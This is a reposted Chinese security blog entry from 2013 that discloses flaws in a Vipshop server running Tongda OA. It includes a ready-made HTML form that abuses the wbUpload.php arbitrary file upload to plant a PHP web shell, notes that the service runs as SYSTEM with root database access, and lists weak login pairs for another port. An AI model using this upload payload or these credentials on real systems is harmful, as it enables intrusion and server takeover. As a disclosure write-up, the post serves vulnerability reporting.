记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

唯品会小礼包(任意文件上传getshell及弱口令)

2013-12-16 15:01
唯品会小礼包(任意文件上传及弱口令)apache采用system账号启动,数据库采用root账号连接。内网额!
 
1. URL:http://121.***.***.122:8090/
 
 
 
采用的是通达OA系统,存在任意文件上传漏洞
 

<form enctype="multipart/form-data" action="http://121.***.***.122:8090//general/vmeet/wbUpload.php?fileName=test.php.111" method="post">



<input type="file" name="Filedata" size="50"><br>



<input type="submit" value="Upload">



</form>

 

apache采用system账号启动,数据库采用root账号连接。
 
 
 
点到为止,就不继续了。
 
 
2.http://121.***.***.122:15698/
 
 
 
存在弱口令:
 
test 123456
 
1 123456
 


知识来源: www.2cto.com/Article/201312/265212.html

阅读:96169 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“唯品会小礼包(任意文件上传getshell及弱口令)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云